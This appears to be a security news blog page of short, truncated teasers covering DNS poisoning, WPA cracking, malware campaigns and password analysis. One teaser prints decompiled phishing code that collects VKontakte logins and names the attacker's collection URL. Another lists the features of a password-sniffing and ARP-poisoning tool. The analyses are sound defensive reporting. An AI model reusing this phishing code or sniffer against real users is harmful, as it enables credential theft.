    What's worth mentioning? The announcement of Agnitum's antivirus passed without press hype: "The official presentation of the new product happened after the first month of its sales through the Internet and in conjunction with the release of the boxed product." The annual license costs 499 rubles, while "Agnitum is ready to raise the price if distributors ask for it. This applies to both the Russian and foreign-language versions."

    Agnitum's promotion of its solutions in Russia ... and abroad differs greatly. In western countries ... Agnitum has resorted to the tactic of stimulating installations through distribution to all registered users of Outpost free Eng ... Read more »
    Views: 617 | Added by: w1zard | Date: 15.03.2011 | Comments (0)



    The domain name chronopay.com, whose theft from the company ChronoPay (owner of the online processing system of the same name) became known on Monday, has been returned to its rightful owner. In case someone does not know: there was recently a post about ChronoPay reporting that its database had been hacked, but this was not the case; only the domain was hijacked.

    The chronopay.com site is now under the control of ChronoPay. The domain chronopay.com was returned to the registrar directNIC on Thursday 12/30/2010 (after stealing the domain chronopay.com, the attackers immediately changed the domain's registrar to another company, namely Network Solutions).

    At the moment the ChronoPay website at chronopay.com is available. The current status of the domain in the registrar's internal system is «high security transfer prohibited». This means that the registrar directNIC has taken special measures to ensure the domain's safety.

    To date, the ChronoPay site is fully operational again. Operative in this situation, th ... Read more »
    Views: 602 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    Because of my work on various projects of my own, I have to deal with win/web programming, design, 3D animation and the administration of my own servers. And also use webmoney, surf, download keys from dangerous sites, install and test various dubious software, etc. Very often I connect all sorts of new devices to the computer.

    If you do all of this in one Windows install, sooner or later it will get sluggish and you will have to reinstall everything from scratch. You can also carelessly pick up some little trojan or virus (although in my case that is very unlikely).

    Against the background of general IT-security paranoia I found the perfect solution for myself: using different virtual machines for each specific range of tasks.

    How I did it:
    1. Installed XP, freewheeling, SP3 on VMware, and installed Far, Office: the necessary minimum for almost every task
    2. From the first machine I made linked clones (a new machine refers to the first as its base) for surfing (and testing sites in different browsers in the configuration ... Read more »
    Views: 644 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    Cryptography guru Bruce Schneier, developer of the Blowfish and Twofish ciphers, discusses an interesting topic in his blog: why, for all their mistrust of documents sent by e-mail, do many organizations rely on signatures on a fax? It's the strangest thing imaginable. Indeed, forging them is no trouble at all: it is enough to cut a signature out of one sheet of paper, paste it onto another, and send it by fax. You need nothing but scissors and glue. Even a child can handle it. Faxes are so poorly protected against forgery that, if you think about it, it is strange that anyone accepts them at all nowadays.

    Bruce Schneier says that he has repeatedly faxed various documents, including book contracts, bank documents for credit card authorization, non-disclosure agreements, etc. "It's amazing how organizations sometimes tend to treat as verified these low-quality, unverified scans, which are transmitted over public communication lines, if they flatly r ... Read more »
    Views: 874 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    ESET NOD32 received its 50th VB100% certification from the British magazine Virus Bulletin, almost the silver wedding anniversary of dearly loving spouses, and Advanced+ from Andreas Clementi's Austrian lab AV-Comparatives, all within three days ...

    Frankly, the speed with which industry news reaches the community sometimes leaves much to be desired. That, in fact, is why I ask you not to judge this post too strictly.

    Meanwhile, on May 31, four days ago, the results of Andreas Clementi's laboratory tests were published; a little later came the report on the regular antivirus testing by Virus Bulletin magazine.

    This time VB100% certificates were given to antiviruses that, on Ubuntu Linux 8.04 LTS Server Edition (Linux users are dancing with a tambourine), showed 100% detection of viruses combined with zero false positives on known clean files.

    More details here. The results of Clementi's retrospective testing are available at this link.

    Are repeated until both ... Read more »
    Views: 695 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    Security experts draw attention to one of the most familiar and natural functions of the browser: remembering which links have been visited. As you know, after you visit a link and reload the page, the link changes color. This information can easily be read with a special script. The danger of such an attack is often underestimated.

    A site owner can easily see which links you have visited before. To this end he may even deliberately place an invisible link on the page, from which a script reads the information. For example, he can check whether you went to a competitor's site, record this fact in cookies and even change the content of his site accordingly. Of course, this is a clear violation of privacy. And it is all the more uncomfortable to know that anyone can learn private information about you so easily. Mozilla developers took notice of this danger in 2002 but did not figure out what could be done.

    Of course, there is no disputing the convenience functions for t ... Read more »
    Views: 588 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    Everyone probably knows that there are many different kinds of security threats. There really are quite a few of them; how many, you will learn by reading under the cut.

    Everything at the links below was taken as an example; if something is no longer there, please do not make claims against the author.

    The same article is available at the following addresses: http://forxakep.ucoz.ru/publ/3-1-0-16
    http://forum.netall.ru/index.php?showtop ...
    http://www.inattack.ru/article/402.html

    Fishing (or phishing).

    A very broad term. Its point is to obtain information (passwords, credit card numbers, etc.) or money from users. The technique is aimed not at one user but at many. For example, letters supposedly from technical support are sent to all known customers of some bank. The letters usually ask the user to send the account password, supposedly because of some technical work. Despite the fact that users are warned that any such information from them, none of the workers may no ... Read more »
    Views: 1128 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    Programmer R. Makwana (Rajendrasinh Babubhai Makwana, an Indian citizen) was sentenced last week to 41 months in prison for planting a "logic bomb" on Fannie Mae's computer servers. From 2006 to 2008 he worked as a contract admin in a data center in Maryland. As a UNIX programmer he serviced a network of about 5000 of the company's servers, and in October 2008 he was fired.

    Fannie Mae's lead engineer later discovered malicious code in one of the standard programs; it was to execute on Jan. 31, 2009 and destroy all information on all the company's servers, including data on finances, securities and mortgage loans. Makwana had root access to all major systems, including backups.

    The malicious code was discovered, as they say, by accident: the above-mentioned specialist decided to scroll to the end of a working script and found several new lines at the end.

    It should be noted that Fannie Mae is the largest mortgage agency; it funds over 20% of m ... Read more »
    Views: 552 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    The Washington Post published a very interesting article on the use of high technology by members of the terrorist organization Al Qaeda. It is not just about the most modern computer equipment, Sony laptops, digital cameras and cryptography using PGP, but also about unique methods of online promotion. Some of them are know-how in the field of hacking social networks. In fact, Al-Qaeda views Western society, which lives in a dense information field, as one big, tightly connected social network and skillfully manipulates it through carefully thought-out actions, including the use of YouTube, Wikipedia and so on.

    A good example of manipulation is a campaign by one of the organization's leaders, Ayman Zawahiri, for whose head the Americans are offering $25 million. It is not known where Ayman is hiding, but he regularly gives online interviews and answers questions sent to him over the Internet. After the start of this campaign in December last year received the 1888 suici ... Read more »
    Views: 596 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    Wired Magazine reports on a hearing held last Thursday in the U.S. House of Representatives on the future of the most ambitious project in modern history for the surveillance of potential terrorists. The so-called Analytical Center of National Security (NSBAC or, more often, NSAC) did not receive further funding of $11 million from the Parliament, which the FBI, its creator, had very much hoped for. The center is the ideological successor of the program "Total Information Awareness" (TIA, the logo on the left), which caused quite a stir in autumn 2002 and whose aim was to collect personal information about virtually all the inhabitants of the planet in real time.

    Within a few weeks of its inception, TIA became a prime target for attacks by opponents of strengthening intelligence agencies inside the country. Its chief ideologue, retired admiral and Naval Intelligence veteran John Poindexter, during his long career had time to earn a reputation as an uncompromising and resolut ... Read more »
    Views: 598 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    A practically exploitable hole has been discovered in the DNS protocol. Not in any particular client, but in the protocol itself. It had been known about for a long time, but all the "experts" agreed that "well, in theory, this may be a problem, but in practice it cannot be used." Not long ago, however, a practical way to use "cache poisoning" was invented, and it upset all the cards. It seems this is another test of the Internet's strength: the "largest synchronized security update in the history of the Internet" is planned, which will involve dozens of vendors (which is not so scary) and hundreds and thousands of ISPs (and this is terrible: many of them are very careless about updating the software on their servers).

    There is little information in the public domain at present. There is an interview with the man who discovered the vulnerability, and there is a site where you can check whether your DNS is vulnerable or not (in fact, of course, will be tested n ... Read more »
    Views: 627 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    Check Point Software Technologies, maker of the popular ZoneAlarm firewall, reported that many users of the firewall were completely cut off from the Internet after installing the latest patch from Microsoft Update. This patch closes a hole associated with a serious vulnerability in the DNS protocol, which became known two days ago.

    The vulnerability in the DNS protocol was so severe that it put all security professionals involved with Internet technologies on alert. If the DNS servers on the Internet are not urgently patched (and they are still unpatched), a hypothetical attacker, by altering DNS tables, can easily redirect a request for any server to any other server (for example, all of a user's mail can be redirected to the attacker's site and from there to the addressee), completely transparently to the user. True, over the past couple of days the attackers have not yet had time to react to the discovery of the new hole (they are certainly workin ... Read more »
    Views: 556 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    Kaspersky Lab, a leading manufacturer of systems protecting against malicious and unwanted software, hacker attacks and spam, has detected a malicious program that infects WMA audio files. The purpose of the infection is to download a Trojan that lets an attacker gain control over the user's computer.

    The worm, named Worm.Win32.GetCodec.a, converts mp3 files to WMA format (while keeping the mp3 extension) and adds a marker containing a link to an infected web page. The marker is activated automatically when the file is played and launches the Internet Explorer browser, which opens the infected page, where the user is prompted to download and install a file disguised as a codec. If the user agrees to the installation, the Trojan Trojan-Proxy.Win32.Agent.arp is downloaded to the computer, through which an attacker can gain control of the attacked PC.

    Previously, the WMA format was used by Trojans only as a disguise, that is, the infected object was not a music file. The peculiarity ... Read more »
    Views: 554 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    I'm sure many of you noticed the story with the passwords on bestpersons.ru. I invite them and other authors of web services to the debate.

    The question is whether Bestpersons needed to have passwords for access to the site at all (which, in general, and increases)? No matter how hard you try, you are still unlikely to manage to store passwords properly.

    Each time you offer the user to save a password (whether a new one for logging in to your site, or passwords from a third-party service), you take on a very serious commitment to the security of that password. Some treat this carelessly, some worse still, but a problem is possible either way, as happened with the resource under discussion.

    All this fuss with passwords resembles an intense desire to keep bags of (other people's) cash at home. And everyone knows that no matter what the door is, wood or steel, and even if you keep a shotgun at home, they will still come and rob you. Isn't it more reliable to keep it in banks, which will return the money anyway?

    Th ... Read more »
    Views: 547 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    Pwnie is the information security world's analogue of the Oscars. Great achievements and failures and, of course, a lot of fun. The second annual Pwnie award ceremony will be held in August 2008 in Las Vegas at BlackHat USA.

    In 2008 there are 9 nominations:

    - For the best server-side bug (Pwnie for Best Server-Side Bug)
    - For the best client-side bug (Pwnie for Best Client-Side Bug)
    - For mass ownage (Pwnie for Mass 0wnage)
    - For the most innovative research (Pwnie for Most Innovative Research)
    - For the lamest vendor response (Pwnie for Lamest Vendor Response)
    - For the most overhyped bug (Pwnie for Most Overhyped Bug)
    - For the best song (Pwnie for Best Song)
    - For the most epic failure (Pwnie for Most Epic FAIL)
    - For lifetime achievement (Pwnie for Lifetime Achievement)

    1. Nomination for Best Server-Side Bug
    Awarded to the person who discov ... Read more »
    Views: 742 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    Today I received a message from one of my friends; its text read as follows:

    Ppivetik, Denic. Smotpi kakoy chat vkontakte - vkontakte.ru / apps.php? Act = s & id = 236634 &.... Zaxodi ckopee to me In very ponpavilcya! Kycha impressions is pepepolnen-nedoctupen)))
    I would have sent the message to the trash, but the last sentence worried me: he just does not write like that.
    I decided to see what kind of fruit this is ...

    Following the link, I saw an ordinary Flash application; it looks like this:



    After all the data is entered, the form reports that the chat is overloaded.
    Of course, I wondered what it actually does in the meantime, so I downloaded the swf file and fed it to Swf Decompiler. After dissecting it, it turned out that the password and e-mail fly off by POST to http://ckrack.peoplego.ru/save.php:

    var my_lv = new LoadVars();
    var result_lv = new LoadVars();
    my_lv.login_v = _root.login_txt.text;
    my_lv.password_v = _root.password_txt.t ... Read more »
    Views: 698 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    It seems that Amazon Web Services (AWS) in the right hands can be a very powerful tool for cracking the most secure wireless networks. Basically that's obvious, but the other day a network security expert named Thomas Roth presented at the Black Hat conference software he created, "tailored" for Amazon Web Services and intended for cracking protected WiFi networks. By the way, the WPA-PSK-secured WiFi network of a company neighboring Tom's organization was broken by him in 20 minutes.

    The capacity Tom leased on AWS and the Elastic Compute Cloud service helped Tom Roth gain access to several secure wireless networks by determining the key. According to the developer, the performance of the capacity he leased at AWS allowed him to try about 400,000 passwords per second. All this, according to Tom, jeopardizes the security of the wireless networks of both individual companies and home users.

    Before Tom Roth, several network security experts had worked with Amazon EC2 to demonstrate a varie ... Read more »
    Views: 594 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    Let us look at a fresh piece of malware that is being actively spread by virtually every known method, from luring victims to a fake site with exploits to hijacking accounts and sending messages with fairly competent social engineering.



    Source

    Today many people received ICQ messages from their friends with roughly the following content:
    hello. hxxp://feels-energy.com/*****/ - look, a cool thing!
    Encoded link: aHR0cDovL2ZlZWxzLWVuZXJneS5jb20vMDczNzMv ==

    The link leads to a page styled as a video download page. It has reviews from people who downloaded it, a download count, and generally everything such pages normally have. It even states explicitly that the video is in SCR (screen saver) format, gives an almost correct size, and so on. The link on the page leads to a zip file of about 81 KB.

    It is aimed at Russian-speaking users.

    Contents

    Inside the archive is an SCR file of 100 KB. Its icon is taken from WMPlayer.

    Development ... Read more »
    Views: 677 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    Inspired by the Habr topic "[Fresh malware] History of Feels-Energy.com".

    Where should you send an infected file if, after a VirusTotal check, some of the antivirus engines stay silent?
    The address list is under the cut; just copy it into the To: field:

    analyse@ikarus.at;
    analysis@norman.no;
    Antivir@dials.ru;
    avsubmit@submit.microsoft.com;
    avsubmit@symantec.com;
    cat@vsnl.com;
    esafe.virus@eAladdin.com;
    hauri98@hauri.co.kr;
    heuristik@antivir.de;
    ipevirus@vet.com.au;
    newvirus@anti-virus.by;
    newvirus@kaspersky.com;
    samples@eset.com;
    samples@sophos.com;
    submit@diamondcs.com.au;
    submit@emsisoft.com;
    submit@ewido.net;
    submit@misec.net;
    submit@simplysup.com;
    submitvirus@fortinet.com;
    support@nsclean.com;
    v3sos@ahnlab.com;
    virsample@pspl.com;
    virus@arcabit.com;
    virus@asw.cz;
    virus@avast.com;
    virus@avira.com;
    virus@ca.com;
    virus@commandcom.com;
    virus@grisoft.cz;
    virus@virusbuster.hu;
    virus_docto ... Read more »
    Views: 1064 | Added by: w1zard | Date: 15.03.2011 | Comments (1)

    The hosts of the popular Discovery channel show «Mythbusters» have found themselves at the center of an unpleasant story that for a couple of days has captured the minds of conspiracy theorists around the world. This week a video recording leaked of Adam Savage speaking at the July conference The Last HOPE, held in New York. Before an audience of several thousand people, he said that the long-awaited episode devoted to debunking the myth that contactless payment cards are unbreakable never aired because of pressure put on the channel by American Express, Visa and Texas Instruments.

    The above-mentioned companies allegedly voiced their reluctance to see brief instructions for bypassing RFID card protection on air during a conference call that the "busters" convened at TI's request. On the show's side, Adam's colleague Grant Imahara took part.

    After the story spread widely, representatives of Texas Instruments (one of the leaders in RFID) to give ... Read more »
    Views: 627 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    I have noticed that on Habr, and on the web in general, many people confuse these abbreviations and lump everything together, so now and then you come across gems like «which is better, MD5 or RSA», «encryption using SHA» or «the program uses powerful encryption algorithms based on 3DES or RSA» (to the last one I just want to add that «a strong encryption algorithm based on N» only really makes sense if these algorithms are used correctly).

    In fact, these algorithms can be divided into the following groups:



    1. Hash algorithms (digest algorithms) are used to compute a unique fixed-length identifier of a message, for example 128 bits (MD5), 160 bits (SHA1, RIPEMD-160, etc.) and more. They have the property that different messages correspond (with very high probability, since the space of possible messages is after all much larger than a fixed 160 bits) to different hashes, and generating a message with a hash given in advance (or recovering the message from the hash) is very complex in terms of time ... Read more »
    Views: 588 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    iPhone is watching you.

    Yesterday the well-known hacker Jonathan [NerveGas] Zdziarski held a 45-minute webcast devoted to cracking the password protection of the iPhone 3G (if you did not watch it live, a recording will be posted in a few days). However, even the general public already knows about the iPhone's "leaky" protection, and special programs that simplify the process have existed for a long time, so the most interesting part is something else.

    During the presentation Zdziarski explained that the iPhone, it turns out, constantly takes screenshots and stores them. They capture the text of e-mail, the IM window and anything else that, by unlucky coincidence, was on the screen when the "Home" button was pressed. This is done purely for aesthetic purposes: when the user presses "Home", the current window is supposed to shrink nicely and fade from the screen, and that is what the screenshot is for.

    Although the iPhone deletes the previous screenshot every time it takes the next one, to res ... Read more »
    Views: 557 | Added by: w1zard | Date: 15.03.2011 | Comments (0)



    The well-known free e-mail service Windows Live Hotmail from Microsoft prepared an unpleasant New Year surprise for its users. According to sources such as the BBC and The Associated Press, some Hotmail users reported on forums and blogs that on January 1 their e-mail accounts had been completely wiped without warning. They could still log in, but the inbox, sent and deleted message folders were empty.

    In two days of panic among Hotmail users, no concrete response has been received from Microsoft, so it is not known whether the mail service was attacked by hackers or whether this is Microsoft's own doing. However, Microsoft spokesperson Catherine Brooker said yesterday that the problem affected a few Hotmail users. The only thing the media have to go on is furious comments from the mail service's users. Cath Baxter, who created a Facebook group about the messages missing from mailboxes, says: "I only received one comment from Microsoft, which ... Read more »
    Views: 607 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    Google AdSense has long been recognized as a potential danger to users. The confirmation of this is its favorable advertising of resources that can harm your computer.
    It is especially frustrating when your site is dedicated to user safety and Google AdSense advertising can send the user to malicious websites.

    I always keep an eye on the cleanliness of the ads and block suspicious links from being shown.
    An example is the ad for the pseudo-antispyware MAXantiSPY: «And you are not infected with SpyWare? Spyware-an extremely dangerous type of virus. Free checking SpyWare ... », which an inexperienced user, intrigued by the warning about a threat, is bound to follow and will then certainly download a malicious file.

    Or the ad for the pseudo-antispyware ASWPro: «Secure Anti 15rub. Free checking and protection from dangerous viruses.» Recently appeared ads that show up for queries such as "free antivirus", "free spyware", etc. are also designed to get users to download ASWPro: "We know when you d ... Read more »
    Views: 683 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    Massachusetts Institute of Technology (MIT) graduates from the company Verdasys have proposed what they consider an original method of protecting sensitive information on a PC from various hard-to-detect trojans, keyloggers, sniffers and other such devilry. The method is to use their own software package, which "crawls" into the system deeper than any malicious program and can maintain a secure communication channel even when the computer is hopelessly infected.

    Verdasys intends to distribute the SiteTrust package through OEM channels, for example bundled with the software that banks provide to their customers. In that case, the moment a client opens their account page in the internet banking system, SiteTrust starts a browser process under its own control, separating the important transaction from other data streams. SiteTrust captures all user input directly from the keyboard and encrypts it.

    The current version of SiteTrust only works on Windows wit ... Read more »
    Views: 558 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    Nothing foretold disaster: users were quietly working away without a care, until suddenly the antivirus started complaining on one machine, then on another, then on a third. The department learned of the situation only a couple of days later, when the fire was already raging everywhere.
    On the servers (where the antivirus had been turned off for performance reasons) there were hundreds of infected exe files, and the infection had spread across all departments.

    A classic beginning? Yes, except that the three-day all-hands rush that is usual in such cases did not help. For two weeks the servers kept getting infected, and none of the antivirus products installed on them could catch the moment of infection of the shared exe files that users need and run every now and then. That is, they sort of catch it, but only when it is too late and the infection has returned to the cleaned machines, where the antivirus does not help.

    Virus sality (sector.12)
    a description of what it does (apparently one of the most detailed on the web) ... Read more »
    Views: 2215 | Added by: w1zard | Date: 15.03.2011 | Comments (17)

    The new Kaspersky Lab product line, Kaspersky Internet Security 2009 and Kaspersky Anti-Virus 2009, implements new functionality for collecting statistics about new threats and their sources and for developing ways to neutralize them.

    Using Kaspersky Security Network involves sending Kaspersky Lab the following information:

    * A unique identifier assigned to your computer. This ID describes the hardware settings of your computer and does not contain any Personal details.
    * Information about the threats detected by application components. Composition of the information depends on the type of threat detected.
    * System Information: OS version, installed service packs, downloads, services and drivers, browsers and email clients, browser extensions, the version number of the installed application from Kaspersky Lab.

    Kaspersky Security Network also collects extended statistics, which inc ... Read more »
    Views: 594 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    List of changes can be found on the official website - intercepter.nerf.ru

    [0x4553-Intercepter] allows you to:

    # Capture the passwords of the following types: ICQ \ IRC \ AIM \ ftp \ IMAP \ POP3 \ SMTP \ LDAP \ BNC \ SOCKS \ HTTP \ WWW \ NNTP \ CVS \ TELNET \ MRA \ DC++ \ VNC \ MySql \ Oracle
    # intercept messages of IM systems such as: ICQ \ AIM \ JABBER \ YAHOO \ MSN \ GADU-GADU \ IRC \ MRA
    # Change the MAC address of network cards.
    # View traffic in raw form, with the possibility of filtration.
    # Special eXtreme mode to capture data on non-specific ports.
    # Store packets in pcap file format and perform offline analysis of dumps.
    # Remote analysis of the traffic through the RPCAP daemon.
    # Built-in ARP poisoning.
    # Intercept and save POP3\SMTP messages in eml format.

    Works on Windows 9x\NT (2K\XP\2k3\Vista).

    Details of the program are described in t ... Read more »
    Views: 1197 | Added by: w1zard | Date: 15.03.2011 | Comments (1)

    Introduction


    Everyone knows that information transmitted over communication channels can be distorted, that is, an error may occur in the transmitted message. Distortion can occur for various reasons: faults in the transmitting or receiving equipment, interference in the communication channel from external sources, or damage to the channel. Various methods are used to protect the information, but the best known and most convenient is error-correcting coding, that is, coding that detects and corrects errors.


    History of error-correcting coding


    The history of error-control coding began in 1948 with the publication of Claude Shannon's famous article "A Mathematical Theory of Communication." Shannon showed that each channel has an associated number C, measured in bits per second and called the channel capacity. If the data transfer rate R required by the communication system ( ... Read more »
    Views: 757 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    A very clever variant of a keylogger has been implemented by staff of the security and cryptography laboratory at the Polytechnic Institute of Lausanne (Ecole Polytechnique Federale de Lausanne). The method they created recognizes key presses by remotely scanning the electromagnetic radiation from a PS/2 port, USB port or laptop keyboard and then analyzing the signal frequency. The point is that each key press generates an electromagnetic pulse with unique characteristics. It can be picked up right from the port and subsequently decoded.



    The researchers' paper mentions four different scanning methods, some of which work at a distance of 20 meters.

    During the experiments, the Swiss experts tested 11 different keyboard models that connect to the system unit via USB and PS/2. All of them were vulnerable to at least one remote scanning method, even when eavesdropped on through a wall from an adjoining room (the video can be viewed at the link above; screenshots are under the cut).

    ... Read more »
    Views: 641 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    People try to break every game console. Enthusiasts who want to run their own hand-written code on it in all the most protected modes try to break it. Enthusiasts who want to "run game backups" on it (or, in plain Russian, to engage in piracy) try to break it. Enthusiasts who want to install Linux on it and, which is also an end in itself, use it more extensively than the console manufacturer would like (because the money is made primarily on games; the console itself is sold at a minimal markup, or even at a loss to the manufacturer) try to break it.
    In the vast majority of cases, the enthusiasts succeed.

    Here we take the most interesting part of hacking the Xbox 360: executing code not signed by MS.


    Hacking for piracy


    Two years ago, the Xbox 360 was broken for piracy, that is, people learned how to run copies of licensed games recorded on discs. I wrote about the details here. In short, whether a disc is licensed was determined entirely by the DVD-ROM firmware, which passed the Xbox itself only a single digit: good disc or not. If you alter ... Read more »
    Views: 1530 | Added by: w1zard | Date: 15.03.2011 | Comments (7)

    Not long ago, two researchers managed to partially crack Wi-Fi Protected Access (WPA), which, for those who do not know, is a data encryption protocol for wireless networks.
    In about 15 minutes, Erik Tews and Martin Beck broke the Temporal Key Integrity Protocol and clearly demonstrated interception of information transmitted in both directions and reading it in the clear. In addition, it is also possible to modify headers and forge packets received by the user.
    In essence, the technique consists of overloading the channel with large amounts of information, which makes it possible to apply a formula developed by the pair of programmers to crack the security key.
    Wired Equivalent Privacy (WEP), part of WPA and an algorithm for securing IEEE 802.11 networks, has long been considered obsolete, since it was developed in the mid-90s. In fact, with special software that is trivially easy to find freely available on the Internet, this algorithm is broken in no time.
    In tu ... Read more »
    Views: 733 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    On November 3, Microsoft published the fifth edition of its Security Intelligence Report (SIR). In it the company described how it sees the evolution of the computer security "threat ecosystem" over the first half of 2008. The latest trends noted in the report are the shift of the attack front to a higher level, from the OS kernel to applications; the final victory of trojans, adware and the like in the category "The main threat of our time"; and, of course, a big leap in the security of Microsoft's own products.

    To separate fact from marketing, on November 4 our people (Bukasa) at the TechEd conference in Barcelona were already extracting information from Vinny Gullotto (left), general manager of the Microsoft Malware Protection Center and leader of the work on SIR. I must say that he told much of it voluntarily. And it was interesting.

    Microsoft gets the information for its reports from millions of computers around the world (10 million in Russia alone) that have the MSRT utility installed, Windows ... Read more »
    Views: 591 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    As a rule, vendor employees are said to be inclined to exaggerate real dangers in order to boost their own sales. Of course, this happens, although among professionals such behavior is generally considered unethical at the very least. For instance, the (ISC)² Code of Ethics, which CISSP professionals must follow, says: "Give reasonable, informed advice; do not create (in your counterpart - translator's note) unfounded anxiety or unfounded confidence." As has already been shown, information security specialists do sometimes violate the canon about unfounded anxiety. But unfounded confidence is no lesser evil.



     Recently, Alexei Lukatsky began publishing a series of articles under the title "Myths and misconceptions of information security." Some of the "myths" relate to the problem of spam. Mr Lukatsky decided to dispel myth number 5, "Spam is bad", and myth number 6, "Spam is detrimental." Of course, the name of Alexei Lukatsky as a m ... Read more »
    Views: 634 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    TLS (Transport Layer Security), formerly known as SSL (Secure Sockets Layer), is currently the de facto standard for protecting transport-layer protocols from various kinds of outside interference. Few people do not use it, but I am not sure that everyone has a good idea of how it actually works and what it provides beyond the banal "well, it encrypts the channel between the client and the server."


    The SSL protocol was developed by Netscape; the purpose of its development was to secure data transmitted at the transport layer of the ISO/OSI model. The latest version of the protocol, SSL 3.0, was published in 1996 and served as the basis for the TLS protocol, whose development was taken up by the IETF; the result of that work was RFC 2246: The TLS protocol, version 1.0, released in 1999. At the moment RFC 5246: The TLS protocol, version 2.0 has been published, which somewhat extends the functionality of the first version while leaving the essence unchanged. ... Read more »
    Views: 554 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    Two days ago a so-called "easter egg" appeared on the site alfastrah.ru: if you click 5-6 times on the phone number in the upper right corner of the header, a video with erotic content starts playing. The details of the viral campaign are described here.

    It is no secret that viral marketing aims at very rapid spread, and visits to the site grew exponentially. Warnings appeared on some forums that when you visit the site, Kaspersky complains and says that a Trojan sits on the site. In a conversation with Kaspersky Lab staff, this information was confirmed. Thus, "viral marketing" turned literally viral. Here is some expert commentary.


    Analysis of the site revealed that, in addition to the erotic cartoon, a virus sits there too. The way it was injected is interesting: it is inserted neatly into the middle of the page. What gets loaded is this (the script is not even encrypted): google- ... Read more »
    Views: 599 | Added by: w1zard | Date: 15.03.2011 | Comments (1)

    MD6 is a variable-length hash algorithm developed by Professor Ronald Rivest of the Massachusetts Institute of Technology in September 2008. It is designed to create "fingerprints", or digests, of messages of arbitrary length. It is proposed as a replacement for the less than perfect MD5. According to the authors, the algorithm is resistant to differential cryptanalysis. MD6 is not sufficiently resistant to collisions of the first kind. It is used to verify the authenticity of published messages by comparing the message digest with the published one. This operation is called "hash verification" (hashcheck).



    Its predecessor (MD5) was created in 1991, when the clock frequency of ordinary processors was no more than 33 MHz. It was supposed to map a binary string of arbitrary length into a string of length d, to be resistant to collisions and to finding pre-images, and to be pseudorandom.
    After it was broken, the American Institute of Standards and Technology (NIST) announced a competition to create the hash fu ... Read more »
    Views: 615 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    Insider activity is perhaps the most vicious phenomenon in the corporate environment, in both the literal and the figurative sense. Today the corporate perimeter is protected not only, and not so much, from external intruders as from ourselves. We will look at this problem through the eyes of the insider, who combines the art of stealing confidential information with walking on a razor's edge.

    Business today is an "arms race": whoever offers their services faster and better is the leader. The "arms" in this field are specific, but the object of the "race" does not change: relevant information, used properly, can provide its owner with a bright future and finish off the competitors.

    The ways of obtaining "useful" information depend on its type and on the infrastructure in which it circulates, so it is difficult to classify the extraction methods. However, there are two fundamentally different methods that, one way or another, deal with collecting and processing it.

    Competi ... Read more »
    Views: 612 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    A follow-up to the topic on the compromise of WPA.
    This is an attempt to understand what actually happened and how it may threaten us. Since a cryptographic attack is the kind of thing that requires quite a lot of specific knowledge to understand, the article can in some ways be considered an overview of security in Wi-Fi networks.

    Well, for starters, let us take a short stroll through the theory of Wi-Fi cryptographic protocols. The impatient, and those not interested in all this scholarly casuistry, are free to skip straight to the conclusion.

    WEP


    The WEP protocol is currently considered obsolete and is not recommended for use at all, in favor of WPA and WPA2. No wonder! Its vulnerabilities are serious enough that they allow the key to be cracked and a protected network to be joined in minutes. How many of those minutes are needed depends on the intensity of traffic on the network; a network with average load is broken in a minute or two (those interested in this question are referred to the article and ... Read more »
    Views: 853 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    In parallel with technologies for protecting Internet traffic from unauthorized access, technologies for intercepting protected traffic are developing too. Intercepting and studying a user's unencrypted traffic has long been easy, even for an ordinary user. Almost everyone knows the word "sniffer". In theory, connections protected by SSL/TLS cannot be intercepted by conventional means. But is that so?

    Actually, not quite. Yes, encrypted traffic is theoretically impossible to decrypt, although, again in theory, given a very strong need and desire even this traffic can be decrypted by finding the keys. However, that requires such an expenditure of resources that breaking it remains relevant only, perhaps, at the governmental or military level :)

    When using a secure connection (a very simple example is HTTPS), all traffic between communication points in the network is encrypted on the sender side and decrypted on the recipient side. Traffic going in both directions is encrypted. In order t ... Read more »
    Views: 629 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    Hello, Habr reader. Today I decided to share with you my thoughts about DDoS attacks. I am not going to explain what they are; by now, in my opinion, even a schoolboy knows that. In short, while once again repelling a powerful attack by thugs on one of my resources, I thought: why not offer the community of educated people a few ideas for fighting one of the most common attack methods, HTTP flooding?

    The essence of this attack is as follows: compromised computers, controlled by their parent servers, generate a large number of requests of the form:

    "GET / HTTP/1.1" XXX XXXX "

    The requests can of course target any page, whether it exists on the resource or not. Depending on the "education" of the botnet and its owners, the attack can go to several URLs and can change tactics depending on what the administrators of the attacked resource do.


    Tracking this attack is quite simple: it is clearly visible when viewing the web server logs "online". But to reflect ... Read more »
    Views: 596 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    Users do not like to exert themselves, and many developers put up with it. Think of the last 10 sites you registered on: how many of them checked your password for complexity? Yet whatever security measures the creators of a system come up with, they may be meaningless if the user makes the attacker's work easier.

    This article presents the results of an analysis of ~100 000 passwords. I hope this analysis will be interesting and useful to many Habr users.

    A little digression

